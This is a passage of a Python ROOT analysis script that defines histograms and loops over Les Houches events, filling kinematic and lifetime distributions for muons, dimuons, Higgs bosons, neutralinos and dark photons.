h_muon_pZ_0 = ROOT.TH1F("h_muon_pZ_0", "h_muon_pZ_0", 125, 0, 125)
h_muon_pZ_0.SetLineColor(ROOT.kBlue)
h_muon_pZ_0.SetLineWidth(2)
h_muon_pZ_0.SetLineStyle(1)
h_muon_pZ_1 = ROOT.TH1F("h_muon_pZ_1", "h_muon_pZ_1", 125, 0, 125)
h_muon_pZ_1.SetLineColor(ROOT.kGreen)
h_muon_pZ_1.SetLineWidth(2)
h_muon_pZ_1.SetLineStyle(2)
h_muon_pZ_2 = ROOT.TH1F("h_muon_pZ_2", "h_muon_pZ_2", 125, 0, 125)
h_muon_pZ_2.SetLineColor(ROOT.kRed)
h_muon_pZ_2.SetLineWidth(2)
h_muon_pZ_2.SetLineStyle(3)
h_muon_pZ_3 = ROOT.TH1F("h_muon_pZ_3", "h_muon_pZ_3", 125, 0, 125)
h_muon_pZ_3.SetLineColor(ROOT.kBlack)
h_muon_pZ_3.SetLineWidth(2)
h_muon_pZ_3.SetLineStyle(125)
################################################################################
# eta of muons
################################################################################
nBins = 60
binMin = -3.0
binMax = 3.0
yMax = 0.045
h_muon_eta_dummy = ROOT.TH1F("h_muon_eta_dummy", "h_muon_eta_dummy", 100, -5, 5)
h_muon_eta_dummy.SetYTitle("Fraction of events / 0.1")
h_muon_eta_dummy.GetYaxis().SetNdivisions(508);
h_muon_eta_dummy.SetTitleOffset(1.35, "Y")
h_muon_eta_dummy.SetXTitle("#eta of #mu")
h_muon_eta_dummy.SetMaximum( yMax )
h_muon_eta_0 = ROOT.TH1F("h_muon_eta_0", "h_muon_eta_0", 100,-5,5)
h_muon_eta_0.SetLineColor(ROOT.kBlue)
h_muon_eta_0.SetLineWidth(2)
h_muon_eta_0.SetLineStyle(1)
h_muon_eta_1 = ROOT.TH1F("h_muon_eta_1", "h_muon_eta_1", 100,-5,5)
h_muon_eta_1.SetLineColor(ROOT.kGreen)
h_muon_eta_1.SetLineWidth(2)
h_muon_eta_1.SetLineStyle(2)
h_muon_eta_2 = ROOT.TH1F("h_muon_eta_2", "h_muon_eta_2", 100,-5,5)
h_muon_eta_2.SetLineColor(ROOT.kRed)
h_muon_eta_2.SetLineWidth(2)
h_muon_eta_2.SetLineStyle(3)
h_muon_eta_3 = ROOT.TH1F("h_muon_eta_3", "h_muon_eta_3", 100,-5,5)
h_muon_eta_3.SetLineColor(ROOT.kBlack)
h_muon_eta_3.SetLineWidth(2)
h_muon_eta_3.SetLineStyle(4)
################################################################################
# mass of dimuons
################################################################################
nBins = 125
binMin = 0.0
binMax = 125.0
yMax = 0.4
#h_dimuon_m_dummy = ROOT.TH1F("h_dimuon_m_dummy", "h_dimuon_m_dummy", nBins, binMin, binMax)
#h_dimuon_m_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_0 = ROOT.TH1F("h_dimuon_m_0", "h_dimuon_m_0", nBins, binMin, binMax)
#h_dimuon_m_0.SetLineColor(ROOT.kBlue)
#h_dimuon_m_0.SetLineWidth(2)
#h_dimuon_m_0.SetLineStyle(1)
#
#h_dimuon_m_1 = ROOT.TH1F("h_dimuon_m_1", "h_dimuon_m_1", nBins, binMin, binMax)
#h_dimuon_m_1.SetLineColor(ROOT.kGreen)
#h_dimuon_m_1.SetLineWidth(2)
#h_dimuon_m_1.SetLineStyle(2)
#
#h_dimuon_m_2 = ROOT.TH1F("h_dimuon_m_2", "h_dimuon_m_2", nBins, binMin, binMax)
#h_dimuon_m_2.SetLineColor(ROOT.kRed)
#h_dimuon_m_2.SetLineWidth(2)
#h_dimuon_m_2.SetLineStyle(3)
#
#h_dimuon_m_3 = ROOT.TH1F("h_dimuon_m_3", "h_dimuon_m_3", nBins, binMin, binMax)
#h_dimuon_m_3.SetLineColor(ROOT.kBlack)
#h_dimuon_m_3.SetLineWidth(2)
#h_dimuon_m_3.SetLineStyle(4)
#
#h_dimuon_m_log_dummy = ROOT.TH1F("h_dimuon_m_log_dummy", "h_dimuon_m_log_dummy", nBins, binMin, binMax)
#h_dimuon_m_log_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_log_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_log_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_log_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_log_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_log_0 = ROOT.TH1F("h_dimuon_m_log_0", "h_dimuon_m_log_0", nBins, binMin, binMax)
#h_dimuon_m_log_0.SetLineColor(ROOT.kBlue)
#h_dimuon_m_log_0.SetLineWidth(2)
#h_dimuon_m_log_0.SetLineStyle(1)
#
#h_dimuon_m_log_1 = ROOT.TH1F("h_dimuon_m_log_1", "h_dimuon_m_log_1", nBins, binMin, binMax)
#h_dimuon_m_log_1.SetLineColor(ROOT.kGreen)
#h_dimuon_m_log_1.SetLineWidth(2)
#h_dimuon_m_log_1.SetLineStyle(2)
#
#h_dimuon_m_log_2 = ROOT.TH1F("h_dimuon_m_log_2", "h_dimuon_m_log_2", nBins, binMin, binMax)
#h_dimuon_m_log_2.SetLineColor(ROOT.kRed)
#h_dimuon_m_log_2.SetLineWidth(2)
#h_dimuon_m_log_2.SetLineStyle(3)
#
#h_dimuon_m_log_3 = ROOT.TH1F("h_dimuon_m_log_3", "h_dimuon_m_log_3", nBins, binMin, binMax)
#h_dimuon_m_log_3.SetLineColor(ROOT.kBlack)
#h_dimuon_m_log_3.SetLineWidth(2)
#h_dimuon_m_log_3.SetLineStyle(4)
#
#h_dimuon_m_real_fake_dummy = ROOT.TH1F("h_dimuon_m_real_fake_dummy", "h_dimuon_m_real_fake_dummy", nBins, binMin, binMax)
#h_dimuon_m_real_fake_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_real_fake_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_real_fake_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_real_fake_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_real_fake_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_real_fake_0 = ROOT.TH1F("h_dimuon_m_real_fake_0", "h_dimuon_m_real_fake_0", nBins, binMin, binMax)
#h_dimuon_m_real_fake_0.SetLineColor(ROOT.kRed)
#h_dimuon_m_real_fake_0.SetLineWidth(2)
#h_dimuon_m_real_fake_0.SetLineStyle(1)
#
#h_dimuon_m_real_fake_1 = ROOT.TH1F("h_dimuon_m_real_fake_1", "h_dimuon_m_real_fake_1", nBins, binMin, binMax)
#h_dimuon_m_real_fake_1.SetLineColor(ROOT.kBlue)
#h_dimuon_m_real_fake_1.SetLineWidth(2)
#h_dimuon_m_real_fake_1.SetLineStyle(2)
#
#h_dimuon_m_real_fake_log_dummy = ROOT.TH1F("h_dimuon_m_real_fake_log_dummy", "h_dimuon_m_real_fake_log_dummy", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_real_fake_log_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_real_fake_log_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_real_fake_log_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_real_fake_log_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_real_fake_log_0 = ROOT.TH1F("h_dimuon_m_real_fake_log_0", "h_dimuon_m_real_fake_log_0", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_0.SetLineColor(ROOT.kRed)
#h_dimuon_m_real_fake_log_0.SetLineWidth(2)
#h_dimuon_m_real_fake_log_0.SetLineStyle(1)
#
#h_dimuon_m_real_fake_log_1 = ROOT.TH1F("h_dimuon_m_real_fake_log_1", "h_dimuon_m_real_fake_log_1", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_1.SetLineColor(ROOT.kBlue)
#h_dimuon_m_real_fake_log_1.SetLineWidth(2)
#h_dimuon_m_real_fake_log_1.SetLineStyle(2)
#########################
h_dimuon_m_fake_log_dummy = ROOT.TH1F("h_dimuon_m_fake_log_dummy", "h_dimuon_m_fake_log_dummy", 1250, 0, 125)
h_dimuon_m_fake_log_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_dimuon_m_fake_log_dummy.GetYaxis().SetNdivisions(508);
h_dimuon_m_fake_log_dummy.SetTitleOffset(1.4, "Y")
h_dimuon_m_fake_log_dummy.SetXTitle("Mass of Fake #mu#mu [GeV]")
h_dimuon_m_fake_log_dummy.SetMaximum( 1 )
h_dimuon_m_fake_log_0 = ROOT.TH1F("h_dimuon_m_fake_log_0", "h_dimuon_m_fake_log_0", 1250, 0, 125)
h_dimuon_m_fake_log_0.SetLineColor(ROOT.kRed)
h_dimuon_m_fake_log_0.SetLineWidth(2)
h_dimuon_m_fake_log_0.SetLineStyle(1)
h_dimuon_m_fake_dummy = ROOT.TH1F("h_dimuon_m_fake_dummy", "h_dimuon_m_fake_dummy", nBins, binMin, binMax)
h_dimuon_m_fake_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_m_fake_dummy.GetYaxis().SetNdivisions(508);
h_dimuon_m_fake_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_m_fake_dummy.SetXTitle("Mass of Fake #mu#mu [GeV]")
h_dimuon_m_fake_dummy.SetMaximum( 1.2 )
h_dimuon_m_fake_0 = ROOT.TH1F("h_dimuon_m_fake_0", "h_dimuon_m_fake_0", nBins, binMin, binMax)
h_dimuon_m_fake_0.SetLineColor(ROOT.kRed)
h_dimuon_m_fake_0.SetLineWidth(2)
h_dimuon_m_fake_0.SetLineStyle(1)
################################################################################
# mass of 2 selected dimuons
################################################################################
m_min = 0.2113
m_max = 3.5536
m_bins = 66
h_m1_vs_m2 = ROOT.TH2F("h_m1_vs_m2", "h_m1_vs_m2", m_bins, m_min, m_max, m_bins, m_min, m_max)
h_m1_vs_m2.SetYTitle("m_{1#mu#mu} [GeV]")
h_m1_vs_m2.SetTitleOffset(1.3, "Y")
h_m1_vs_m2.SetXTitle("m_{2#mu#mu} [GeV]")
h_m1 = ROOT.TH1F("h_m1", "h_m1", 101, 0.1, 10.1)
h_m1.SetLineColor(ROOT.kRed)
h_m1.SetLineWidth(2)
h_m1.SetLineStyle(1)
h_m2 = ROOT.TH1F("h_m2", "h_m2", 101, 0.1, 10.1)
h_m2.SetYTitle("Events / 0.1 GeV")
h_m2.SetXTitle("m_{#mu#mu} [GeV]")
h_m2.SetTitleOffset(1.35, "Y")
h_m2.SetLineColor(ROOT.kBlue)
h_m2.SetLineWidth(2)
h_m2.SetLineStyle(1)
h_m2.SetMaximum(110000)
h_dimuon_1_pT_dummy = ROOT.TH1F("h_dimuon_1_pT_dummy", "h_dimuon_1_pT_dummy", 100, 0, 100)
h_dimuon_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_pT_dummy.SetXTitle("p_{T} of #mu#mu [GeV]")
h_dimuon_1_pT_dummy.SetMaximum( 0.1 )
h_dimuon_1_pZ_dummy = ROOT.TH1F("h_dimuon_1_pZ_dummy", "h_dimuon_1_pZ_dummy", 100, 0, 100)
h_dimuon_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_pZ_dummy.SetXTitle("|p_{Z}| of #mu#mu [GeV]")
h_dimuon_1_pZ_dummy.SetMaximum( 0.1 )
h_dimuon_1_Eta_dummy = ROOT.TH1F("h_dimuon_1_Eta_dummy", "h_dimuon_1_Eta_dummy",100,-5,5)
h_dimuon_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_dimuon_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_Eta_dummy.SetXTitle("#eta of #mu#mu")
h_dimuon_1_Eta_dummy.SetMaximum( 0.1 )
h_dimuon_1_Phi_dummy = ROOT.TH1F("h_dimuon_1_Phi_dummy", "h_dimuon_1_Phi_dummy",80,-4,4 )
h_dimuon_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_dimuon_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_Phi_dummy.SetXTitle("#phi of #mu#mu [rad]")
h_dimuon_1_Phi_dummy.SetMaximum( 0.05 )
h_dimuon_1_p_dummy = ROOT.TH1F("h_dimuon_1_p_dummy", "h_dimuon_1_p_dummy", 100, 0, 100)
h_dimuon_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_p_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_p_dummy.SetXTitle("p of #mu#mu [GeV]")
h_dimuon_1_p_dummy.SetMaximum( 0.1 )
h_dimuon_1_M_dummy = ROOT.TH1F("h_dimuon_1_M_dummy", "h_dimuon_1_M_dummy", 50, 0.5, 10.005)
h_dimuon_1_M_dummy.SetYTitle("Fraction of events / 0.2 GeV")
h_dimuon_1_M_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_M_dummy.SetXTitle("Mass of #mu#mu [GeV]")
h_dimuon_1_M_dummy.SetMaximum( 1.4 )
h_dimuon_1_p = ROOT.TH1F("h_dimuon_1_p", "h_dimuon_1_p", 100, 0, 100)
h_dimuon_1_p.SetLineColor(ROOT.kBlue)
h_dimuon_1_p.SetLineWidth(2)
h_dimuon_1_p.SetLineStyle(1)
h_dimuon_1_M = ROOT.TH1F("h_dimuon_1_M", "h_dimuon_1_M", 500, 0.005, 10.005)
h_dimuon_1_M.SetLineColor(ROOT.kBlue)
h_dimuon_1_M.SetLineWidth(2)
h_dimuon_1_M.SetLineStyle(1)
h_dimuon_1_pT = ROOT.TH1F("h_dimuon_1_pT", "h_dimuon_1_pT", 100, 0, 100)
h_dimuon_1_pT.SetLineColor(ROOT.kBlue)
h_dimuon_1_pT.SetLineWidth(2)
h_dimuon_1_pT.SetLineStyle(1)
h_dimuon_1_pZ = ROOT.TH1F("h_dimuon_1_pZ", "h_dimuon_1_pZ", 100, 0, 100)
h_dimuon_1_pZ.SetLineColor(ROOT.kBlue)
h_dimuon_1_pZ.SetLineWidth(2)
h_dimuon_1_pZ.SetLineStyle(1)
h_dimuon_1_Eta = ROOT.TH1F("h_dimuon_1_Eta", "h_dimuon_1_Eta",100,-5,5)
h_dimuon_1_Eta.SetLineColor(ROOT.kBlue)
h_dimuon_1_Eta.SetLineWidth(2)
h_dimuon_1_Eta.SetLineStyle(1)
h_dimuon_1_Phi = ROOT.TH1F("h_dimuon_1_Phi", "h_dimuon_1_Phi", 80,-4,4)
h_dimuon_1_Phi.SetLineColor(ROOT.kBlue)
h_dimuon_1_Phi.SetLineWidth(2)
h_dimuon_1_Phi.SetLineStyle(1)
h_dimuon_2_p = ROOT.TH1F("h_dimuon_2_p", "h_dimuon_2_p", 100, 0, 100)
h_dimuon_2_p.SetLineColor(ROOT.kRed)
h_dimuon_2_p.SetLineWidth(2)
h_dimuon_2_p.SetLineStyle(1)
h_dimuon_2_pT = ROOT.TH1F("h_dimuon_2_pT", "h_dimuon_2_pT", 100, 0, 100)
h_dimuon_2_pT.SetLineColor(ROOT.kRed)
h_dimuon_2_pT.SetLineWidth(2)
h_dimuon_2_pT.SetLineStyle(1)
h_dimuon_2_pZ = ROOT.TH1F("h_dimuon_2_pZ", "h_dimuon_2_pZ", 100, 0, 100)
h_dimuon_2_pZ.SetLineColor(ROOT.kRed)
h_dimuon_2_pZ.SetLineWidth(2)
h_dimuon_2_pZ.SetLineStyle(1)
h_dimuon_2_Eta = ROOT.TH1F("h_dimuon_2_Eta", "h_dimuon_2_Eta", 100,-5,5)
h_dimuon_2_Eta.SetLineColor(ROOT.kRed)
h_dimuon_2_Eta.SetLineWidth(2)
h_dimuon_2_Eta.SetLineStyle(1)
h_dimuon_2_Phi = ROOT.TH1F("h_dimuon_2_Phi", "h_dimuon_2_Phi", 80,-4,4)
h_dimuon_2_Phi.SetLineColor(ROOT.kRed)
h_dimuon_2_Phi.SetLineWidth(2)
h_dimuon_2_Phi.SetLineStyle(1)
################################################################################
# BAM Functions
################################################################################
def plotOverflow(hist):
name = hist.GetName()
title = hist.GetTitle()
nx = hist.GetNbinsX()+1
x1 = hist.GetBinLowEdge(1)
bw = hist.GetBinWidth(nx)
x2 = hist.GetBinLowEdge(nx)+bw
htmp = ROOT.TH1F(name, title, nx, x1, x2)
for i in range(1, nx):
htmp.Fill(htmp.GetBinCenter(i), hist.GetBinContent(i))
htmp.Fill(hist.GetNbinsX()-1, hist.GetBinContent(0))
htmp.SetEntries(hist.GetEntries())
htmp.SetLineColor(hist.GetLineColor())
htmp.SetLineWidth(hist.GetLineWidth())
htmp.SetLineStyle(hist.GetLineStyle())
htmp.DrawNormalized("same")
return
def integral(hist):
eachBinWidth = hist.GetBinWidth(hist.GetNbinsX()+1)
#print "Begin Integral"
#print eachBinWidth
runningSum = 0
for i in range(0, hist.GetNbinsX()+1):
area = eachBinWidth * hist.GetBinContent(i)
runningSum = runningSum + area
#print i
#print area
return runningSum
def getEta(pz, p):
output = atanh(pz/p)
return output
def scaleAxisY(hist, dummy):
normFactor = hist.Integral()
max = hist.GetBinContent(hist.GetMaximumBin()) / normFactor
scale = 1.8
newMax = scale*max
dummy.SetMaximum(newMax)
def scaleAxisYcT(hist, dummy):
normFactor = integral(hist)
max = hist.GetBinContent(hist.GetMaximumBin()) / normFactor
scale = 1.8
newMax = scale*max
dummy.SetMaximum(newMax)
################################################################################
# Loop over events
################################################################################
nEvents = 0
isEvent = False
nEventsOK = 0
for line in f:
if line == '<event>\n':
isEvent = True
isEvent = True
nEvents = nEvents + 1
nLinesInEvent = 0
nParticlesInEvent = 0
muons = []
dimuons = []
DimuonIndex1 = []
DimuonIndex2 = []
bamDimuons = []
FakeIndex1 = []
FakeIndex2 = []
FakeDimuons = []
lifetimes = []
higgs = []
neutralinos = []
darkNeutralinos = []
gammaDs = []
n1PlotCounter = 0
gammaDPlotCounter = 0
nDPlotCounter = 0
if nEvents > nExit: break
continue
if line == '</event>\n':
isEvent = False
continue
if isEvent == True:
nLinesInEvent = nLinesInEvent + 1
#***************************************************************************
# first line with common event information
#***************************************************************************
if nLinesInEvent == 1:
word_n = 0
# print "I", line
for word in line.split():
word_n = word_n + 1
if word_n == 1: NUP = int(word) # number of particles in the event
if word_n == 2: IDPRUP = int(word) # process type
if word_n == 3: XWGTUP = float(word) # event weight
if word_n == 4: SCALUP = float(word) # factorization scale Q
if word_n == 5: AQEDUP = float(word) # the QED coupling alpha_em
if word_n == 6: AQCDUP = float(word) # the QCD coupling alpha_s
if word_n > 6: print "Warning! Wrong common event information", line
#***************************************************************************
# line with particle information
#***************************************************************************
if nLinesInEvent >= 2:
nParticlesInEvent = nParticlesInEvent + 1
word_n = 0
# print "P", line
for word in line.split():
word_n = word_n + 1
if word_n == 1: IDUP = int(word) # particle PDG identity code
if word_n == 2: ISTUP = int(word) # status code
if word_n == 3: MOTHUP1 = int(word) # position of the first mother of particle
if word_n == 4: MOTHUP2 = int(word) # position of the last mother of particle
if word_n == 5: ICOLUP1 = int(word) # tag for the colour flow info
if word_n == 6: ICOLUP2 = int(word) # tag for the colour flow info
if word_n == 7: PUP1 = float(word) # px in GeV
if word_n == 8: PUP2 = float(word) # py in GeV
if word_n == 9: PUP3 = float(word) # pz in GeV
if word_n == 10: PUP4 = float(word) # E in GeV
if word_n == 11: PUP5 = float(word) # m in GeV
if word_n == 12: VTIMUP = float(word) # invariant lifetime ctau in mm
if word_n == 13: SPINUP = float(word) # cosine of the angle between the spin vector of a particle and its three-momentum
if word_n > 13: print "Warning! Wrong particle line", line
if abs(IDUP) == muonID:
if IDUP > 0: q = -1
if IDUP < 0: q = 1
v4 = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
muons.append(( q, v4.Px(), v4.Py(), v4.Pz(), v4.E(), v4.M(), v4.Pt(), v4.Eta(), v4.Phi(), MOTHUP1 ))
if abs(IDUP) == higgsID:
if IDUP > 0: q = 0
if IDUP < 0: q = 0
vHiggs = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
higgs.append((q, vHiggs.Px(), vHiggs.Py(), vHiggs.Pz(), vHiggs.E(), vHiggs.M(), vHiggs.Pt(), vHiggs.Eta(), vHiggs.Phi() ))
h_higgs_pT.Fill( higgs[len(higgs)-1][6] )
h_higgs_M.Fill( higgs[len(higgs)-1][5] )
h_higgs_p.Fill( sqrt( higgs[len(higgs)-1][1]*higgs[len(higgs)-1][1] + higgs[len(higgs)-1][2]*higgs[len(higgs)-1][2] + higgs[len(higgs)-1][3]*higgs[len(higgs)-1][3] ) )
h_higgs_pZ.Fill( fabs(higgs[len(higgs)-1][3]) )
#h_higgs_Eta.Fill( higgs[len(higgs)-1][7] )
h_higgs_Phi.Fill( higgs[len(higgs)-1][8] )
if abs(IDUP) == n1ID:
q = 0
vNeutralino = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
neutralinos.append((q, vNeutralino.Px(), vNeutralino.Py(), vNeutralino.Pz(), vNeutralino.E(), vNeutralino.M(), vNeutralino.Pt(), vNeutralino.Eta(), vNeutralino.Phi() ))
if len(neutralinos) == 2 and n1PlotCounter == 0:
neutralinos_sorted_pT = sorted(neutralinos, key=itemgetter(6), reverse=True)
neutralinos = neutralinos_sorted_pT
h_n1_1_pT.Fill( neutralinos[0][6] )
h_n1_2_pT.Fill( neutralinos[1][6] )
h_n1_1_p.Fill( sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ) )
h_n1_2_p.Fill( sqrt( neutralinos[1][1]*neutralinos[1][1] + neutralinos[1][2]*neutralinos[1][2] + neutralinos[1][3]*neutralinos[1][3] ) )
h_n1_1_M.Fill( neutralinos[0][5] )
h_n1_1_M.Fill( neutralinos[1][5] )
h_n1_1_pZ.Fill( fabs(neutralinos[0][3]) )
h_n1_2_pZ.Fill( fabs(neutralinos[1][3]) )
h_n1_1_Eta.Fill( getEta(neutralinos[0][3],(sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ))) )
h_n1_1_Phi.Fill( neutralinos[0][8] )
h_n1_2_Eta.Fill( getEta(neutralinos[1][3], sqrt( neutralinos[1][1]*neutralinos[1][1] + neutralinos[1][2]*neutralinos[1][2] + neutralinos[1][3]*neutralinos[1][3] )) )
#print "PUP3, PZ, P, ETA:"
#print neutralinos[0][7]
#print neutralinos[0][3]
#print (sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ))
#print getEta(neutralinos[0][3],(sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] )))
h_n1_2_Phi.Fill( neutralinos[1][8] )
n1PlotCounter = 1
if abs(IDUP) == nDID:
q = 0
vDarkNeutralino = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
darkNeutralinos.append((q, vDarkNeutralino.Px(), vDarkNeutralino.Py(), vDarkNeutralino.Pz(), vDarkNeutralino.E(), vDarkNeutralino.M(), vDarkNeutralino.Pt(), vDarkNeutralino.Eta(), vDarkNeutralino.Phi() ))
if len(darkNeutralinos) == 2 and nDPlotCounter == 0:
darkNeutralinos_sorted_pT = sorted(darkNeutralinos, key=itemgetter(6), reverse=True)
darkNeutralinos = darkNeutralinos_sorted_pT
h_nD_1_pT.Fill( darkNeutralinos[0][6] )
h_nD_2_pT.Fill( darkNeutralinos[1][6] )
h_nD_1_p.Fill( sqrt( darkNeutralinos[0][1]*darkNeutralinos[0][1] + darkNeutralinos[0][2]*darkNeutralinos[0][2] + darkNeutralinos[0][3]*darkNeutralinos[0][3] ) )
h_nD_2_p.Fill( sqrt( darkNeutralinos[1][1]*darkNeutralinos[1][1] + darkNeutralinos[1][2]*darkNeutralinos[1][2] + darkNeutralinos[1][3]*darkNeutralinos[1][3] ) )
h_nD_1_M.Fill( darkNeutralinos[0][5] )
h_nD_1_M.Fill( darkNeutralinos[1][5] )
h_nD_1_pZ.Fill( fabs(darkNeutralinos[0][3]) )
h_nD_2_pZ.Fill( fabs(darkNeutralinos[1][3]) )
h_nD_1_Eta.Fill( getEta(darkNeutralinos[0][3], sqrt( darkNeutralinos[0][1]*darkNeutralinos[0][1] + darkNeutralinos[0][2]*darkNeutralinos[0][2] + darkNeutralinos[0][3]*darkNeutralinos[0][3] )) )
h_nD_1_Phi.Fill( darkNeutralinos[0][8] )
h_nD_2_Eta.Fill( getEta(darkNeutralinos[1][3], sqrt( darkNeutralinos[1][1]*darkNeutralinos[1][1] + darkNeutralinos[1][2]*darkNeutralinos[1
][2] + darkNeutralinos[1][3]*darkNeutralinos[1][3] )) )
h_nD_2_Phi.Fill( darkNeutralinos[1][8] )
vectorSum =( ( darkNeutralinos[0][1] + darkNeutralinos[1][1] )*( darkNeutralinos[0][1] + darkNeutralinos[1][1] ) ) + ( (darkNeutralinos[0][2] + darkNeutralinos[1][2])*(darkNeutralinos[0][2] + darkNeutralinos[1][2]) )
Etmiss.Fill(vectorSum)
nDPlotCounter = 1
if abs(IDUP) == gammaDID:
q = 0
vgammaDs = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
gammaDs.append(( q, vgammaDs.Px(), vgammaDs.Py(), vgammaDs.Pz(), vgammaDs.E(), vgammaDs.M(), vgammaDs.Pt(), vgammaDs.Eta(), vgammaDs.Phi()))
h_gammaD_cT.Fill( VTIMUP )
pmom = sqrt( vgammaDs.Px()*vgammaDs.Px() + vgammaDs.Py()*vgammaDs.Py() + vgammaDs.Pz()*vgammaDs.Pz() )
beta = pmom/(sqrt(vgammaDs.M()*vgammaDs.M() + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_cT_lab.Fill( lorentz*VTIMUP )
pmomxy = sqrt( vgammaDs.Px()*vgammaDs.Px() + vgammaDs.Py()*vgammaDs.Py() )
betaxy = pmomxy/sqrt( vgammaDs.M()*vgammaDs.M() + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_cT_XY_lab.Fill( lorentzxy*VTIMUP )
pmomz = sqrt( vgammaDs.Pz()*vgammaDs.Pz() )
betaz = pmomz/sqrt( vgammaDs.M()*vgammaDs.M() + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_cT_Z_lab.Fill( lorentzZ * VTIMUP )
lifetimes.append( (VTIMUP, vgammaDs.Px(), vgammaDs.Py(), vgammaDs.Pz(), vgammaDs.Pt(), vgammaDs.M() ))
if len(gammaDs) == 2 and gammaDPlotCounter == 0:
gammaDs_sorted_pT = sorted(gammaDs, key=itemgetter(6), reverse=True)
gammaDs = gammaDs_sorted_pT
lifetimes_sorted_pT = sorted(lifetimes, key=itemgetter(4), reverse=True)
lifetimes = lifetimes_sorted_pT
h_gammaD_1_cT.Fill( lifetimes[0][0] )
pmom = sqrt( lifetimes[0][1]*lifetimes[0][1] + lifetimes[0][2]*lifetimes[0][2] + lifetimes[0][3]*lifetimes[0][3] )
beta = pmom/(sqrt(lifetimes[0][5]*lifetimes[0][5] + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_1_cT_lab.Fill( lorentz*lifetimes[0][0] )
#print "pmom, beta, lorentz"
#print pmom
#print beta
#print lorentz
#print lorentz*lifetimes[0][0]
pmomxy = sqrt( lifetimes[0][1]*lifetimes[0][1] + lifetimes[0][2]*lifetimes[0][2] )
betaxy = pmomxy/sqrt( lifetimes[0][5]*lifetimes[0][5] + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_1_cT_XY_lab.Fill( lorentzxy*lifetimes[0][0] )
pmomz = sqrt( lifetimes[0][3]*lifetimes[0][3] )
betaz = pmomz/sqrt( lifetimes[0][5]*lifetimes[0][5] + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_1_cT_Z_lab.Fill( lorentzZ * lifetimes[0][0] )
h_gammaD_2_cT.Fill( lifetimes[1][0] )
pmom = sqrt( lifetimes[1][1]*lifetimes[1][1] + lifetimes[1][2]*lifetimes[1][2] + lifetimes[1][3]*lifetimes[1][3] )
beta = pmom/(sqrt(lifetimes[1][5]*lifetimes[1][5] + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_2_cT_lab.Fill( lorentz*lifetimes[1][0] )
pmomxy = sqrt( lifetimes[1][1]*lifetimes[1][1] + lifetimes[1][2]*lifetimes[1][2] )
betaxy = pmomxy/sqrt( lifetimes[1][5]*lifetimes[1][5] + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_2_cT_XY_lab.Fill( lorentzxy*lifetimes[1][0] )
pmomz = sqrt( lifetimes[1][3]*lifetimes[1][3] )
betaz = pmomz/sqrt( lifetimes[1][5]*lifetimes[1][5] + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_2_cT_Z_lab.Fill( lorentzZ * lifetimes[1][0] )
h_gammaD_1_pT.Fill( gammaDs[0][6] )
h_gammaD_2_pT.Fill( gammaDs[1][6] )
